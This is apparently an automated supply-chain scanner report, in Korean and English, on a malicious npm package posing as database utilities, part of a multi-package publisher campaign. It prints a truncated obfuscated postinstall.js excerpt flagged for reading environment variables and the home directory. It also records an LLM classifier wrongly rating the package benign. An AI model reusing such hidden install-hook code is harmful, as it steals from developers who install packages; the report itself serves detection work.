// npm 패키지
@cloudplatform-single-spa/vpn
Internal database utilities with connection pooling, query builder and migration support
버전
3
메인테이너
1
라이선스
UNLICENSED
최초 publish
2026-05-27
publisher
mr.4nd3r50n
tarball
17,433 B
AUTO-PUBLISHED·1개 버전 인덱싱됨·최근 publish: 2026-05-28
// exfil path
what is read → where it ships
steals
- ○ home dir
sends to
(no destination string extracted — payload may be dynamic / obfuscated)
evidence in excerpt
> 'use strict';function a0_0x1bda(_0x311ec7,_0x284285){_0x311ec7=_0x311ec7-(0x8ad+0x24e6+-0x2bfb);const _0xe6c532=a0_0x1897();let _0x545342=_0xe6c532[_0x311ec7];if(a0_0x1bda['fARuTs']===undefined){var _…
// publisher 캠페인 by mr.4nd3r50n
이 계정에서 catch된 패키지 9건
고립된 catch가 아닙니다. 동일 publisher가 8개의 다른 패키지를 추가로 발행했고, 모두 파이프라인이 catch했습니다 — 일회성이 아닌 조직적 캠페인의 형태입니다. 아래 링크는 각 형제 catch의 분석으로 이동합니다.
// offending code· @100.100.100· 1 file flagged
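llm: benign · 0.85 → 의심 전송지 없음, 원격 실행 형태 없음 — 1 known-vendor host(s).
참고: 이 llm 판정은 같은 항목의 heuristic 100/100 및 osv-flagged:MAL-2026-5003 신호와 상충합니다. postinstall 스크립트가 난독화되어 있어 전송지 문자열이 추출되지 않은 것일 수 있으므로, '의심 전송지 없음'을 전송지가 없다는 근거로 해석해서는 안 됩니다.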
- @100.100.100 · AUTO-PUBLISHED · publisher: mr.4nd3r50n
  heuristic 100/100 · static flags 2 · llm benign (0.85) via ollama
  install-scripts:postinstall · new-publisher:1d · anomalous-major-version:100 · publisher-multi-name-burst:24 · publisher-version-pump:25 · osv-flagged:MAL-2026-5003 · reads-env-vars · reads-homedir
→ 의심 전송지 없음, 원격 실행 형태 없음 — 1 known-vendor host(s).
// offending code · 1 file flagged · patterns: 2
--- install scripts --- ### postinstall node scripts/postinstall.js ### prepublishOnly echo 'Building...' --- package/scripts/postinstall.js (excerpt) --- 'use strict';function a0_0x1bda(_0x311ec7,_0x284285){_0x311ec7=_0x311ec7-(0x8ad+0x24e6+-0x2bfb);const _0xe6c532=a0_0x1897();let _0x545342=_0xe6c532[_0x311ec7];if(a0_0x1bda['fARuTs']===undefined){var _0x7761cf=function(_0xc8f4ed){const _0x211b50='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let _0x2c1a4f='',_0x1317bb='',_0x379f1a=_0x2c1a4f+_0x7761cf,_0x20157d=(''+function(){return-0xad*0x1c+0xa*-0x1a0+0x2*0x1196;})['indexOf']('\x0a')!==-(0x1e9f+-0xb5f+-0x133f*0x1);for(let _0x51f451=-0x2*0x503+0xdf9+-0x3f3,_0x2b0802,_0x3969c8,_0x2a9e19=0x226e+0x762+-0x1*0x29d0;_0x3969c8=_0xc8f4ed['charAt'](_0x2a9e19++);~_0x3969c8&&(_0x2b0802=_0x51f451%(0x2451+0x1f5a+0x43a7*-0x1)?_0x2b0802*(-0x67*-0x2e+0x1c9e+-0x2ee0)+_0x3969c8:_0x3969c8,_0x51f451++%(-0x20b1+0x1d26*0x1+0x38f))?_0x2c1a4f+=_0x20157d||_0x379f1a['charCodeAt'](_0x2a9e19+(-0x13a3+0x1396+0x17))-(-0x26d+0x8d*-0xf+-0xaba*-0x1)!==-0x30*-0x88+-0x53*0x15+-0x3bd*0x5?String['fromCharCode'](-0x80e+0x5e7*-0x6+0x2c77&_0x2b0802>>(-(-0x245+-0x1*0x110f+0x1356)*_0x51f451&-0x2579*0x1+-0x224*0x7+0x347b)):_0x51f451:0x27*-0x4f+0x311+0x8f8){_0x3969c8=_0x211b50['indexOf'](_0x3969c8);}for(let _0x4ab2d9=-0x9e9+0x2440+-0x1*0x1a57,_0x4918bf=_0x2c1a4f['length'];_0x4ab2d9<_0x4918bf;_0x4ab2d9++){_0x1317bb+='%'+('00'+_0x2c1a4f['charCodeAt'](_0x4ab2d9)['toString'](-0xb90+-0x6*-0x29+-0xc3*-0xe))['slice'](-(0x9d*-0x2b+-0x1eb*0xd+0x3350));}return decodeURIComponent(_0x1317bb);};a0_0x1bda['JTZaWg']=_0x7761cf,a0_0x1bda['aypmgE']={},a0_0x1bda['fARu --- bundled output (OSV-MAL flagged — LLM scope expansion) --- --- dist/index.d.ts (bundled) --- export interface PoolOptions { host?: string; port?: number; database?: string; user?: string; password?: string; max?: number; } export interface Pool { host: string; port: number; database: string; } export function createPool(options?: 
PoolOptions): Pool; export function query(pool: Pool, sql: string, params?: unknown[]): Promise<unknown[]>; export function transaction(pool: Pool, fn: (client: unknown) => Promise<unknown>): Promise<unknown>; export function migrate(pool: Pool, dir?: string): Promise<string[]>; --- dist/index.js (bundled) --- 'use strict'; // dist/index.js module.exports = require('../src/index.js');
